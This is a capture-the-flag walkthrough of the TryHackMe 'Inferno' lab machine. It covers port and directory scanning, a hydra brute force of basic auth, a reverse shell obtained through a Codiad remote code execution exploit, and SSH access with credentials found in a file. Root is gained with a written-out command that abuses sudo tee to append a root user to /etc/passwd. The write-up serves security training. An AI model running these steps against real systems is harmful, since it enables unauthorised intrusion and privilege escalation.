The Inferno room on TryHackMe is described as a “Real Life machine vs CTF. The machine is designed to be real-life and is perfect for newbies starting out in penetration testing”. The goal is to find two keys on the machine (user – local.txt and root – proof.txt)


After performing an nmap scan we find a lot of open ports on the target. But after investigating the ports the only ones that are running any services are port 22 and port 80.

22/tcp    open  ssh           syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http          syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno

When we take a look at the web page all we get is some text and an image.

Lets see what we can find out by using gobuster.

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        40
[+] Wordlist:       directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/02/13 13:47:05 Starting gobuster
/inferno (Status: 401)
/server-status (Status: 403)
2021/02/13 13:51:39 Finished

We found a directory called inferno, but it’s protected with basic auth.

Gaining access

We want to gain access to the protected directory inferno. But we don’t have any credentials or even usernames. We can create a short list of possible usernames to use with hydra.


Using those usernames and rockyou for the passwords we get a result when we try the username admin.

[80][http-get] host: 10.10.x.x   login: admin   password: <REDACTED>
[STATUS] attack finished for 10.10.x.x (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Now we can log in to the protected path. When we gain access we get a log-in screen, using the same credentials for the basic auth we gain access to a web IDE.

After poking around a bit we discover that we don’t have permission to create or edit any file. We also find out that the web IDE is Codiad and that it’s no longer maintained. Using searchsploit we find two different vulnerabilities, but none is working on our target.

When we google for codiad exploit we find a RCE for the latest version of Codiad. Following the instructions and running the exploit against our target we get a remote shell!

listening on [any] 4445 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.x.x] 42772
bash: cannot set terminal process group (934): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$ whoami

Gaining user access

Checking out the /home directory we find the home directory for the user dante and that we have read permissions. After some digging around in the home directory we can find a file called .download.dat in the Downloads directory. The contents of the file is a hexdump, and when we decode the file we get the following.

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.

«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.

Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.

Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».


Looks like some credentials at the last line. Lets try them out.

ssh -l dante 10.10.x.x
dante@10.10.x.x's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Sat Feb 13 17:43:27 UTC 2021

  System load:  0.08              Processes:           605
  Usage of /:   42.3% of 8.79GB   Users logged in:     0
  Memory usage: 63%               IP address for eth0: 10.10.x.x
  Swap usage:   0%

39 packages can be updated.
0 updates are security updates.

Last login: Mon Jan 11 15:56:07 2021 from

Awesome! Lets grab the user flag.

dante@Inferno:~$ cat local.txt 

Privilege escalation

Now it’s time to find a way to get root privileges, lets check our sudo access.

dante@Inferno:~$ sudo -l
 Matching Defaults entries for dante on Inferno:
     env_reset, mail_badpass,
 User dante may run the following commands on Inferno:
     (root) NOPASSWD: /usr/bin/tee

So we have access to tee which means we are able to write text to files as root. Lets try to add an entry in /etc/passwd with root privileges. First we need to create a password hash for our new user, we can do that by running openssl passwd -1 -salt pwn pwn which gives us the hash $1$pwn$AxNbnbaujRUXRur/DewJ8/. Now we can use this to create a new entry.

dante@Inferno:~$ echo "pwn:\$1\$pwn\$AxNbnbaujRUXRur/DewJ8/:0:0:root:/root:/bin/bash" | sudo tee -a /etc/passwd

Lets find out if it works.

dante@Inferno:~$ su pwn
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls -al
total 32
drwx------  5 root root 4096 Jan 11 15:45 .
drwxr-xr-x 24 root root 4096 Jan 11 14:57 ..
lrwxrwxrwx  1 root root    9 Jan 11 15:22 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-x---  3 root root 4096 Jan 11 15:45 .config
drwxr-xr-x  3 root root 4096 Jan 11 15:30 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   79 Jan 11 15:45 proof.txt
drwx------  2 root root 4096 Jan 11 15:19 .ssh

Great! Now lets grab the root flag.

root@Inferno:~# cat proof.txt 

You've rooted Inferno!